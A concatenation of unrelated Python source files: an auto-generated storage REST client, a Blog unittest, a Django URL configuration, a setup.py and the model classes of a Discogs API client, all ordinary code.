:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start_time: Time to start sample in milliseconds since epoch.
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_file_systems_performance_with_http_info(**kwargs)
else:
(data) = self.list_file_systems_performance_with_http_info(**kwargs)
return data
def list_file_systems_performance_with_http_info(self, **kwargs):
"""
List instant or historical file system performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_file_systems_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
        :param int resolution: The sample frequency in milliseconds.
        :param str protocol: Sample performance of the specified protocol only.
:param int end_time: Time to end sample in milliseconds since epoch.
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
        :param int limit: The maximum number of resources to return; must be >= 0.
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start_time: Time to start sample in milliseconds since epoch.
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:param bool total_only: Return only the total object.
:return: FileSystemPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resolution', 'protocol', 'end_time', 'filter', 'ids', 'limit', 'names', 'sort', 'start_time', 'start', 'token', 'total_only']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_file_systems_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'protocol' in params:
query_params.append(('protocol', params['protocol']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'total_only' in params:
query_params.append(('total_only', params['total_only']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_filesystem_policies(self, **kwargs):
"""
List policies attached to filesystems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_filesystem_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
        :param int limit: The maximum number of resources to return; must be >= 0.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_filesystem_policies_with_http_info(**kwargs)
else:
(data) = self.list_filesystem_policies_with_http_info(**kwargs)
return data
def list_filesystem_policies_with_http_info(self, **kwargs):
"""
List policies attached to filesystems.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_filesystem_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
        :param int limit: The maximum number of resources to return; must be >= 0.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: PolicyMemberResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names', 'filter', 'sort', 'start', 'limit', 'token']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_filesystem_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'token' in params:
query_params.append(('token', params['token']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems/policies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PolicyMemberResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
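    # Usage sketch (illustrative, not part of the generated client): assuming
    # `api` is an instance of this API class wired to an authenticated
    # ApiClient, a synchronous call might look like:
    #   res = api.list_filesystem_policies(member_names=['fs1'], limit=10)
    # The keyword arguments map directly onto the query parameters documented
    # above, and the response is deserialized as a PolicyMemberResponse.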
def update_file_systems(self, attributes, **kwargs):
"""
Update an existing file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_file_systems(attributes, callback=callback_function)
        :param callback function: The callback function
            for an asynchronous request. (optional)
        :param FileSystem attributes: The new attributes; only modifiable fields may be specified. (required)
        :param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
        :param str name: The name of the file system or snapshot to be updated.
        :param bool discard_non_snapshotted_data: This parameter must be set to `true` in order to restore a file system from a snapshot or to demote a file system (which restores the file system from the common baseline snapshot). Setting this parameter to `true` is an acknowledgement that any non-snapshotted data currently in the file system will be irretrievably lost.
        :param bool discard_non_snapshotted_data: This parameter must be set to `true` in order to restore a file system from a snapshot or to demote a file system (which restores the file system from the common baseline snapshot). Setting this parameter to `true` is an acknowledgement that any non-snapshotted data currently in the file system will be irretrievably lost.
        :param bool delete_link_on_eradication: If set to `true`, the file system can be destroyed even if it has a replica link. If set to `false`, the file system cannot be destroyed if it has a replica link. Defaults to `false`.
        :param bool ignore_usage: Allow update operations that would leave a hard_limit_enabled file system with usage above its provisioned size. Such an update either sets hard_limit_enabled while usage is higher than the provisioned size, or resizes the provisioned size to a value below the current usage while hard_limit_enabled is `true`.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_file_systems_with_http_info(attributes, **kwargs)
else:
            data = self.update_file_systems_with_http_info(attributes, **kwargs)
return data
def update_file_systems_with_http_info(self, attributes, **kwargs):
"""
Update an existing file system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_file_systems_with_http_info(attributes, callback=callback_function)
        :param callback function: The callback function
            for an asynchronous request. (optional)
        :param FileSystem attributes: The new attributes; only modifiable fields may be specified. (required)
        :param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
        :param str name: The name of the file system or snapshot to be updated.
        :param bool discard_non_snapshotted_data: This parameter must be set to `true` in order to restore a file system from a snapshot or to demote a file system (which restores the file system from the common baseline snapshot). Setting this parameter to `true` is an acknowledgement that any non-snapshotted data currently in the file system will be irretrievably lost.
        :param bool delete_link_on_eradication: If set to `true`, the file system can be destroyed even if it has a replica link. If set to `false`, the file system cannot be destroyed if it has a replica link. Defaults to `false`.
        :param bool ignore_usage: Allow update operations that would leave a hard_limit_enabled file system with usage above its provisioned size. Such an update either sets hard_limit_enabled while usage is higher than the provisioned size, or resizes the provisioned size to a value below the current usage while hard_limit_enabled is `true`.
:return: FileSystemResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attributes', 'ids', 'name', 'discard_non_snapshotted_data', 'delete_link_on_eradication', 'ignore_usage']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_file_systems" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attributes' is set
if ('attributes' not in params) or (params['attributes'] is None):
raise ValueError("Missing the required parameter `attributes` when calling `update_file_systems`")
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'name' in params:
query_params.append(('name', params['name']))
if 'discard_non_snapshotted_data' in params:
query_params.append(('discard_non_snapshotted_data', params['discard_non_snapshotted_data']))
if 'delete_link_on_eradication' in params:
query_params.append(('delete_link_on_eradication', params['delete_link_on_eradication']))
if 'ignore_usage' in params:
query_params.append(('ignore_usage', params['ignore_usage']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'attributes' in params:
body_params = params['attributes']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.10/file-systems', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileSystemResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
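    # Usage sketch (illustrative, not part of the generated client): assuming
    # `api` is an instance of this API class and FileSystem is the generated
    # model, a resize might look like:
    #   attrs = FileSystem(provisioned=2 * 1024 ** 4)
    #   res = api.update_file_systems(attrs, name='fs1')
    # Only modifiable FileSystem fields may be set on `attrs`; the call issues
    # a PATCH to /1.10/file-systems and returns a FileSystemResponse.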
|
import unittest
from app.models import Blog
class BlogTest(unittest.TestCase):
    '''
    Test class to verify the behaviour of the Blog class
    '''
def setUp(self):
'''
Set up method that will run before every Test
'''
self.new_blog = Blog('Apostle Paul', 'Labour in the Lord is not in vain')
def test_instance(self):
        self.assertTrue(isinstance(self.new_blog, Blog))
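# Standard unittest entry point so the file can be run directly.
if __name__ == '__main__':
    unittest.main()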
|
"""techCourse URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('mainSite.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
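# A minimal sketch of the included URLconf this file assumes (hypothetical
# contents of mainSite/urls.py; the actual view names are project-specific):
#   from django.urls import path
#   from . import views
#   urlpatterns = [
#       path('', views.index, name='index'),
#   ]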
|
from setuptools import setup
setup(
    name="mywhopackage",
    install_requires=["django==1.0"],
    extras_require={
        "test": ["pytest==2.0"],
        "docs": ["Sphinx==1.0"],
    },
)
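# Usage note: the extras declared above are installed with pip's extras
# syntax, e.g. `pip install mywhopackage[test]` pulls in pytest==2.0 on top
# of the base django==1.0 requirement.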
|
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
from six import with_metaclass
from discogs_client.exceptions import HTTPError
from discogs_client.utils import parse_timestamp, update_qs, omit_none
class SimpleFieldDescriptor(object):
"""
An attribute that determines its value using the object's fetch() method.
If transform is a callable, the value will be passed through transform when
read. Useful for strings that should be ints, parsing timestamps, etc.
Shorthand for:
@property
def foo(self):
return self.fetch('foo')
"""
def __init__(self, name, writable=False, transform=None):
self.name = name
self.writable = writable
self.transform = transform
def __get__(self, instance, owner):
if instance is None:
return self
value = instance.fetch(self.name)
if self.transform:
value = self.transform(value)
return value
def __set__(self, instance, value):
if self.writable:
instance.changes[self.name] = value
return
raise AttributeError("can't set attribute")
class ObjectFieldDescriptor(object):
"""
An attribute that determines its value using the object's fetch() method,
and passes the resulting value through an APIObject.
If optional = True, the value will be None (rather than an APIObject
instance) if the key is missing from the response.
If as_id = True, the value is treated as an ID for the new APIObject rather
than a partial dict of the APIObject.
Shorthand for:
@property
def baz(self):
return BazClass(self.client, self.fetch('baz'))
"""
def __init__(self, name, class_name, optional=False, as_id=False):
self.name = name
self.class_name = class_name
self.optional = optional
self.as_id = as_id
def __get__(self, instance, owner):
if instance is None:
return self
wrapper_class = CLASS_MAP[self.class_name.lower()]
response_dict = instance.fetch(self.name)
if self.optional and not response_dict:
return None
if self.as_id:
# Response_dict wasn't really a dict. Make it so.
response_dict = {'id': response_dict}
return wrapper_class(instance.client, response_dict)
def __set__(self, instance, value):
raise AttributeError("can't set attribute")
class ListFieldDescriptor(object):
"""
An attribute that determines its value using the object's fetch() method,
and passes each item in the resulting list through an APIObject.
Shorthand for:
@property
def bar(self):
return [BarClass(self.client, d) for d in self.fetch('bar', [])]
"""
def __init__(self, name, class_name):
self.name = name
self.class_name = class_name
def __get__(self, instance, owner):
if instance is None:
return self
wrapper_class = CLASS_MAP[self.class_name.lower()]
return [wrapper_class(instance.client, d) for d in instance.fetch(self.name, [])]
def __set__(self, instance, value):
raise AttributeError("can't set attribute")
class ObjectCollectionDescriptor(object):
"""
An attribute that determines its value by fetching a URL to a paginated
list of related objects, and passes each item in the resulting list through
an APIObject.
Shorthand for:
@property
def frozzes(self):
return PaginatedList(self.client, self.fetch('frozzes_url'), 'frozzes', FrozClass)
"""
def __init__(self, name, class_name, url_key=None, list_class=None):
self.name = name
self.class_name = class_name
if url_key is None:
url_key = name + '_url'
self.url_key = url_key
if list_class is None:
list_class = PaginatedList
self.list_class = list_class
def __get__(self, instance, owner):
if instance is None:
return self
wrapper_class = CLASS_MAP[self.class_name.lower()]
return self.list_class(instance.client, instance.fetch(self.url_key), self.name, wrapper_class)
def __set__(self, instance, value):
raise AttributeError("can't set attribute")
class Field(object):
"""
A placeholder for a descriptor. Is transformed into a descriptor by the
APIObjectMeta metaclass when the APIObject classes are created.
"""
_descriptor_class = None
def __init__(self, *args, **kwargs):
self.key = kwargs.pop('key', None)
self.args = args
self.kwargs = kwargs
def to_descriptor(self, attr_name):
return self._descriptor_class(self.key or attr_name, *self.args, **self.kwargs)
class SimpleField(Field):
"""A field that just returns the value of a given JSON key."""
_descriptor_class = SimpleFieldDescriptor
class ListField(Field):
"""A field that returns a list of APIObjects."""
_descriptor_class = ListFieldDescriptor
class ObjectField(Field):
"""A field that returns a single APIObject."""
_descriptor_class = ObjectFieldDescriptor
class ObjectCollection(Field):
"""A field that returns a paginated list of APIObjects."""
_descriptor_class = ObjectCollectionDescriptor
class APIObjectMeta(type):
def __new__(cls, name, bases, dict_):
for k, v in dict_.items():
if isinstance(v, Field):
dict_[k] = v.to_descriptor(k)
return super(APIObjectMeta, cls).__new__(cls, name, bases, dict_)
class APIObject(with_metaclass(APIObjectMeta, object)):
def repr_str(self, string):
if sys.version_info < (3,):
return string.encode('utf-8')
return string
class PrimaryAPIObject(APIObject):
"""A first-order API object that has a canonical endpoint of its own."""
def __init__(self, client, dict_):
self.data = dict_
self.client = client
self._known_invalid_keys = []
self.changes = {}
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.id == other.id
return NotImplemented
def __ne__(self, other):
equal = self.__eq__(other)
return NotImplemented if equal is NotImplemented else not equal
def refresh(self):
if self.data.get('resource_url'):
data = self.client._get(self.data['resource_url'])
self.data.update(data)
self.changes = {}
def save(self):
if self.data.get('resource_url'):
# TODO: This should be PATCH
self.client._post(self.data['resource_url'], self.changes)
# Refresh the object, in case there were side-effects
self.refresh()
def delete(self):
if self.data.get('resource_url'):
self.client._delete(self.data['resource_url'])
def fetch(self, key, default=None):
if key in self._known_invalid_keys:
return default
try:
# First, look in the cache of pending changes
return self.changes[key]
except KeyError:
pass
try:
# Next, look in the potentially incomplete local cache
return self.data[key]
except KeyError:
pass
# Now refresh the object from its resource_url.
# The key might exist but not be in our cache.
self.refresh()
try:
return self.data[key]
        except KeyError:
self._known_invalid_keys.append(key)
return default
# This is terribly cheesy, but makes the client API more consistent
class SecondaryAPIObject(APIObject):
"""
An object that wraps parts of a response and doesn't have its own
endpoint.
"""
def __init__(self, client, dict_):
self.client = client
self.data = dict_
def fetch(self, key, default=None):
return self.data.get(key, default)
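# A minimal sketch of how Field placeholders become descriptors; the class
# below is illustrative only and not part of the Discogs API surface.
class _ExampleWidget(SecondaryAPIObject):
    # APIObjectMeta swaps these Field placeholders for descriptors when the
    # class is created, so attribute reads go through self.fetch().
    name = SimpleField()
    size = SimpleField(transform=int)
def _example_widget_usage():
    # The transform runs on read, turning the raw string '7' into an int.
    w = _ExampleWidget(None, {'name': 'spindle', 'size': '7'})
    return w.name, w.size  # -> ('spindle', 7)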
class BasePaginatedResponse(object):
"""Base class for lists of objects spread across many URLs."""
def __init__(self, client, url):
self.client = client
self.url = url
self._num_pages = None
self._num_items = None
self._pages = {}
self._per_page = 50
self._list_key = 'items'
self._sort_key = None
self._sort_order = 'asc'
self._filters = {}
@property
def per_page(self):
return self._per_page
@per_page.setter
def per_page(self, value):
self._per_page = value
self._invalidate()
def _invalidate(self):
self._pages = {}
self._num_pages = None
self._num_items = None
def _load_pagination_info(self):
data = self.client._get(self._url_for_page(1))
self._pages[1] = [
self._transform(item) for item in data[self._list_key]
]
self._num_pages = data['pagination']['pages']
self._num_items = data['pagination']['items']
def _url_for_page(self, page):
base_qs = {
'page': page,
'per_page': self._per_page,
}
if self._sort_key is not None:
base_qs.update({
'sort': self._sort_key,
'sort_order': self._sort_order,
})
base_qs.update(self._filters)
return update_qs(self.url, base_qs)
def sort(self, key, order='asc'):
if order not in ('asc', 'desc'):
raise ValueError("Order must be one of 'asc', 'desc'")
self._sort_key = key
self._sort_order = order
self._invalidate()
return self
def filter(self, **kwargs):
self._filters = kwargs
self._invalidate()
return self
@property
def pages(self):
if self._num_pages is None:
self._load_pagination_info()
return self._num_pages
@property
def count(self):
if self._num_items is None:
self._load_pagination_info()
return self._num_items
def page(self, index):
if index not in self._pages:
data = self.client._get(self._url_for_page(index))
self._pages[index] = [
self._transform(item) for item in data[self._list_key]
]
return self._pages[index]
def _transform(self, item):
return item
def __getitem__(self, index):
page_index = index // self.per_page + 1
offset = index % self.per_page
try:
page = self.page(page_index)
except HTTPError as e:
if e.status_code == 404:
raise IndexError(e.msg)
else:
raise
return page[offset]
def __len__(self):
return self.count
def __iter__(self):
for i in range(1, self.pages + 1):
page = self.page(i)
for item in page:
yield item
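# Usage sketch: pagination is lazy. Given any BasePaginatedResponse instance
# `plist`, pages are fetched on demand and cached per page index.
def _example_pagination(plist):
    plist.per_page = 10   # the setter invalidates any cached pages
    total = len(plist)    # triggers one request for the pagination info
    first = plist[0]      # index 0 falls on page 1, fetched then cached
    return total, first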
class PaginatedList(BasePaginatedResponse):
"""A paginated list of objects of a particular class."""
def __init__(self, client, url, key, class_):
super(PaginatedList, self).__init__(client, url)
self._list_key = key
self.class_ = class_
def _transform(self, item):
return self.class_(self.client, item)
class Wantlist(PaginatedList):
def add(self, release, notes=None, notes_public=None, rating=None):
release_id = release.id if isinstance(release, Release) else release
data = {
'release_id': str(release_id),
'notes': notes,
'notes_public': notes_public,
'rating': rating,
}
self.client._put(self.url + '/' + str(release_id), omit_none(data))
self._invalidate()
def remove(self, release):
release_id = release.id if isinstance(release, Release) else release
self.client._delete(self.url + '/' + str(release_id))
self._invalidate()
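# Usage sketch: Wantlist.add/remove accept either a Release instance or a
# bare release ID; optional fields left as None are omitted from the PUT.
def _example_wantlist(user):
    user.wantlist.add(1234567, notes='heard on the radio', rating=4)
    user.wantlist.remove(1234567)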
class OrderMessagesList(PaginatedList):
def add(self, message=None, status=None, email_buyer=True, email_seller=False):
data = {
'message': message,
'status': status,
'email_buyer': email_buyer,
'email_seller': email_seller,
}
self.client._post(self.url, omit_none(data))
self._invalidate()
class MixedPaginatedList(BasePaginatedResponse):
"""A paginated list of objects identified by their type parameter."""
def __init__(self, client, url, key):
super(MixedPaginatedList, self).__init__(client, url)
self._list_key = key
def _transform(self, item):
# In some cases, we want to map the 'title' key we get back in search
# results to 'name'. This way, you can repr() a page of search results
# without making 50 requests.
if item['type'] in ('label', 'artist'):
item['name'] = item['title']
return CLASS_MAP[item['type']](self.client, item)
class Artist(PrimaryAPIObject):
id = SimpleField()
name = SimpleField()
real_name = SimpleField(key='realname')
images = SimpleField()
profile = SimpleField()
data_quality = SimpleField()
name_variations = SimpleField(key='namevariations')
url = SimpleField(key='uri')
urls = SimpleField()
aliases = ListField('Artist')
members = ListField('Artist')
groups = ListField('Artist')
def __init__(self, client, dict_):
super(Artist, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/artists/{1}'.format(client._base_url, dict_['id'])
@property
def releases(self):
return MixedPaginatedList(self.client, self.fetch('releases_url'), 'releases')
def __repr__(self):
return self.repr_str('<Artist {0!r} {1!r}>'.format(self.id, self.name))
class Release(PrimaryAPIObject):
id = SimpleField()
title = SimpleField()
year = SimpleField()
thumb = SimpleField()
data_quality = SimpleField()
status = SimpleField()
genres = SimpleField()
images = SimpleField()
country = SimpleField()
notes = SimpleField()
formats = SimpleField()
styles = SimpleField()
url = SimpleField(key='uri')
videos = ListField('Video')
tracklist = ListField('Track')
artists = ListField('Artist')
credits = ListField('Artist', key='extraartists')
labels = ListField('Label')
companies = ListField('Label')
def __init__(self, client, dict_):
super(Release, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/releases/{1}'.format(client._base_url, dict_['id'])
@property
def master(self):
master_id = self.fetch('master_id')
if master_id:
return Master(self.client, {'id': master_id})
else:
return None
def __repr__(self):
return self.repr_str('<Release {0!r} {1!r}>'.format(self.id, self.title))
class Master(PrimaryAPIObject):
id = SimpleField()
title = SimpleField()
data_quality = SimpleField()
styles = SimpleField()
genres = SimpleField()
images = SimpleField()
url = SimpleField(key='uri')
videos = ListField('Video')
tracklist = ListField('Track')
main_release = ObjectField('Release', as_id=True)
versions = ObjectCollection('Release')
def __init__(self, client, dict_):
super(Master, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/masters/{1}'.format(client._base_url, dict_['id'])
def __repr__(self):
return self.repr_str('<Master {0!r} {1!r}>'.format(self.id, self.title))
class Label(PrimaryAPIObject):
id = SimpleField()
name = SimpleField()
profile = SimpleField()
urls = SimpleField()
images = SimpleField()
contact_info = SimpleField()
data_quality = SimpleField()
url = SimpleField(key='uri')
sublabels = ListField('Label')
parent_label = ObjectField('Label', optional=True)
releases = ObjectCollection('Release')
def __init__(self, client, dict_):
super(Label, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/labels/{1}'.format(client._base_url, dict_['id'])
def __repr__(self):
return self.repr_str('<Label {0!r} {1!r}>'.format(self.id, self.name))
class User(PrimaryAPIObject):
id = SimpleField()
username = SimpleField()
releases_contributed = SimpleField()
num_collection = SimpleField()
num_wantlist = SimpleField()
num_lists = SimpleField()
rank = SimpleField()
rating_avg = SimpleField()
url = SimpleField(key='uri')
name = SimpleField(writable=True)
profile = SimpleField(writable=True)
location = SimpleField(writable=True)
home_page = SimpleField(writable=True)
registered = SimpleField(transform=parse_timestamp)
inventory = ObjectCollection('Listing', key='listings', url_key='inventory_url')
wantlist = ObjectCollection('WantlistItem', key='wants', url_key='wantlist_url', list_class=Wantlist)
def __init__(self, client, dict_):
super(User, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/users/{1}'.format(client._base_url, dict_['username'])
@property
def orders(self):
return PaginatedList(self.client, self.client._base_url + '/marketplace/orders', 'orders', Order)
@property
def collection_folders(self):
resp = self.client._get(self.fetch('collection_folders_url'))
return [CollectionFolder(self.client, d) for d in resp['folders']]
def __repr__(self):
return self.repr_str('<User {0!r} {1!r}>'.format(self.id, self.username))
class WantlistItem(PrimaryAPIObject):
id = SimpleField()
rating = SimpleField(writable=True)
notes = SimpleField(writable=True)
notes_public = SimpleField(writable=True)
release = ObjectField('Release', key='basic_information')
def __init__(self, client, dict_):
super(WantlistItem, self).__init__(client, dict_)
def __repr__(self):
return self.repr_str('<WantlistItem {0!r} {1!r}>'.format(self.id, self.release.title))
# TODO: folder_id should be a Folder object; needs folder_url
# TODO: notes should be first-order (somehow); needs resource_url
class CollectionItemInstance(PrimaryAPIObject):
id = SimpleField()
rating = SimpleField()
folder_id = SimpleField()
notes = SimpleField()
release = ObjectField('Release', key='basic_information')
def __init__(self, client, dict_):
super(CollectionItemInstance, self).__init__(client, dict_)
def __repr__(self):
return self.repr_str('<CollectionItemInstance {0!r} {1!r}>'.format(self.id, self.release.title))
class CollectionFolder(PrimaryAPIObject):
id = SimpleField()
name = SimpleField()
count = SimpleField()
def __init__(self, client, dict_):
super(CollectionFolder, self).__init__(client, dict_)
@property
def releases(self):
# TODO: Needs releases_url
return PaginatedList(self.client, self.fetch('resource_url') + '/releases', 'releases', CollectionItemInstance)
def __repr__(self):
return self.repr_str('<CollectionFolder {0!r} {1!r}>'.format(self.id, self.name))
class Listing(PrimaryAPIObject):
id = SimpleField()
status = SimpleField()
allow_offers = SimpleField()
condition = SimpleField()
sleeve_condition = SimpleField()
ships_from = SimpleField()
comments = SimpleField()
audio = SimpleField()
url = SimpleField(key='uri')
price = ObjectField('Price')
release = ObjectField('Release')
seller = ObjectField('User')
posted = SimpleField(transform=parse_timestamp)
def __init__(self, client, dict_):
super(Listing, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/marketplace/listings/{1}'.format(client._base_url, dict_['id'])
def __repr__(self):
return self.repr_str('<Listing {0!r} {1!r}>'.format(self.id, self.release.data['description']))
class Order(PrimaryAPIObject):
id = SimpleField()
next_status = SimpleField()
shipping_address = SimpleField()
additional_instructions = SimpleField()
url = SimpleField(key='uri')
status = SimpleField(writable=True)
fee = ObjectField('Price')
buyer = ObjectField('User')
seller = ObjectField('User')
created = SimpleField(transform=parse_timestamp)
last_activity = SimpleField(transform=parse_timestamp)
messages = ObjectCollection('OrderMessage', list_class=OrderMessagesList)
items = ListField('Listing')
def __init__(self, client, dict_):
super(Order, self).__init__(client, dict_)
self.data['resource_url'] = '{0}/marketplace/orders/{1}'.format(client._base_url, dict_['id'])
# Setting shipping is a little weird -- you can't change the
# currency, and you use the 'shipping' key instead of 'value'
@property
def shipping(self):
return Price(self.client, self.fetch('shipping'))
@shipping.setter
def shipping(self, value):
self.changes['shipping'] = value
def __repr__(self):
return self.repr_str('<Order {0!r}>'.format(self.id))
class OrderMessage(SecondaryAPIObject):
subject = SimpleField()
